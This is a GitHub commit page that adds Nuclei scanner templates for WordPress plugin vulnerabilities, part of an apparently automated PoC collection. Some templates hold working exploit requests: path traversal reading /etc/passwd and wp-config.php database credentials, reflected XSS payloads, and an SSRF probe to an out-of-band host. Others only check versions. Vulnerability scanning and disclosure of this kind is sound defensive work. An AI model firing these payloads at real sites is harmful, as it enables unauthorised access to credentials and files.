Skip to content

Commit

Permalink
20241217
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 17, 2024
1 parent a4d1be1 commit 343cc22
Show file tree
Hide file tree
Showing 59 changed files with 3,206 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241216
20241217
57 changes: 57 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: password-protect-page-5bc1bd6076293fc447faec40c0b81b7b

info:
name: >
PPWP – Password Protect Pages <= 1.9.5 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d9ac0d84-dff4-4a03-a530-cac47ffaf2bb?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/password-protect-page/"
google-query: inurl:"/wp-content/plugins/password-protect-page/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,password-protect-page,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/password-protect-page/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "password-protect-page"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.9.5')
26 changes: 26 additions & 0 deletions poc/cve/CVE-2012-0896-2136.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: CVE-2012-0896
info:
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
author: daffainfo
severity: high
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
classification:
cve-id: CVE-2012-0896
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
25 changes: 25 additions & 0 deletions poc/cve/CVE-2012-2371-2179.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-10924-2753.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2016-10924

info:
name: Wordpress eBook Download < 1.2 - Directory Traversal
author: idealphase
severity: high
description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
reference:
- https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
- https://www.exploit-db.com/exploits/39575
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924

classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2016-10924
cwe-id: CWE-22

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'

matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and

- type: status
status:
- 200
27 changes: 27 additions & 0 deletions poc/cve/CVE-2020-24148-4789.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CVE-2020-24148

info:
name: Import XML & RSS Feeds Wordpress Plugin <= 2.0.1 SSRF

author: dwisiswant0
severity: critical
reference: https://github.com/dwisiswant0/CVE-2020-24148
description: |
Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed)
plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.10
cve-id: CVE-2020-24148
cwe-id: CWE-918

requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"
body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
38 changes: 38 additions & 0 deletions poc/cve/CVE-2021-24298-5684.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: CVE-2021-24298

info:
name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24298
- https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/
- https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24298
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-47533-06aab2b91df6cee595f800e3a7a1068a.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2023-47533-06aab2b91df6cee595f800e3a7a1068a

info:
name: >
Countdown and CountUp, WooCommerce Sales Timer <= 1.8.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
author: topscoder
severity: low
description: >
The Countdown and CountUp, WooCommerce Sales Timer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c1ec113c-d11f-4b0b-8d4a-46d37687b3b2?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
cvss-score: 5.5
cve-id: CVE-2023-47533
metadata:
fofa-query: "wp-content/plugins/countdown-wpdevart-extended/"
google-query: inurl:"/wp-content/plugins/countdown-wpdevart-extended/"
shodan-query: 'vuln:CVE-2023-47533'
tags: cve,wordpress,wp-plugin,countdown-wpdevart-extended,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/countdown-wpdevart-extended/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "countdown-wpdevart-extended"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.8.2')
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-10356-1e614bbedd6f70b8c7be8b8186dbd8ab.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-10356-1e614bbedd6f70b8c7be8b8186dbd8ab

info:
name: >
ElementsReady Addons for Elementor <= 6.4.8 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates
author: topscoder
severity: low
description: >
The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc/Widgets/accordion/output/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-10356
metadata:
fofa-query: "wp-content/plugins/element-ready-lite/"
google-query: inurl:"/wp-content/plugins/element-ready-lite/"
shodan-query: 'vuln:CVE-2024-10356'
tags: cve,wordpress,wp-plugin,element-ready-lite,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/element-ready-lite/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "element-ready-lite"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 6.4.8')
Loading

0 comments on commit 343cc22

Please sign in to comment.